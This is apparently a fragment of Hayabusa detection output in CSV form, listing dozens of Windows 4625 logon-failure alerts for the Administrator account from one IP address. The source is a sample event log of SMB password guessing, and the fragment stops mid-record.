+2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PeEfbWpoipfYtOKv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RKJW1vSrIAbRTzyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aU4G8NBru22Vc4Cl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sacBcqxV97FUihrd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 41Ms0lEMeT0jYxYj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkQWVEHGM1NxowR0 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4qKqRY7L2IQRoU57 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eMIkvwbvqc9V6CFs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PehzjCnK42ZPUE7e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1fqw2GWiYfO0kU83 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WFPJJNCFdPJl4igl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: zc6CrAr7YoozKB6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xHXminAIeV4ZJIK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 06YmUCHNZqbaZMdZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fYoENCtP2uPy9xNh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TRJRuXJTTH1afAfH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MpnkzTlc3Uvj3hpY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oIuD8haFzR8P87rL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XL1IreMAiE564NXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vMUiCaMGBC46MnPJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MOSWbwooyb60LExG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oSDNF7s3vbtkZIOz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JBMk0qOV6237XtK3 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j41R1U1tYPvApCkZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcPkVZSeg5VwChW8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aDLxt5gaFDTKsiVl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94JvBKdxJkawQQMT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KgBMk00K3iC1GQem | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: XdGOj9Ybm6bcCo3p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: by6F4YKorxhp5ahn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1G6ZOgOaV6luDQN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qqSwNfvpPLQd6ZH1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mxtJJj54xSzHibHI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Y3yznfdaZ7dtwDO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esllFn4asbLxwkBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Pr0cgd6cF5ukhZ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pS2fabTrbl6rZ1NB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkylDDmUyuT57HdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Aqs8rSvuLAQuhfDp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KI07KTgBJc4kBSKY | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Re3n3nJ8EEhRRT3G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BzspAC3z1csEn0Ve | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tpkb6bf42SLUst3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1F5d2wn60OgAExW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bhPNRHWhTyonDPuA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: zEsnyWpUuHVBo6et | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I2FwaWy9TALkk9eU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fuikeQsxlOUVifVj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZWdsRJp9fHypPI1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B0j0IBX2eZnx99n9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YIZ5Knxg0xr0WmDb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wuej3f7mEoWmd4SX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B0LcCi06ilIhFPwb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jWsCGgoFmH06rRf4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bP47JjNKqtYIZPsC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mNlWZ9o0xf7bl2d0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnPnB2lEN3BSDpXJ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dVMyeF9jGuzHkTHg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sDKLl3PjW2qrzJGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rkllnePSq3NQ5wgC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9qLWgQnR7P9cs7s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C1AdU07nzvv7RB2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: cHgiB5SMiQtsl5oD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 03e7QOn36l0jH35H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DoJBywV8x8cURwrO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SDYGYO6s6g6Dbx8r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nUqXpeTNePFyBmCo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T2h0qJWcbzRe1GSj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: edsfNOovOl1Ow503 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cxCC83XLMIJrNMvl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MzussOcg5ihdrnD0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 55l4HKICu8x0FpQv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5GmlVWDjZ75tT08G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6v1DkuFvB04PESQ | IP Addr: 192.168.198.149 | AuthPackage: 
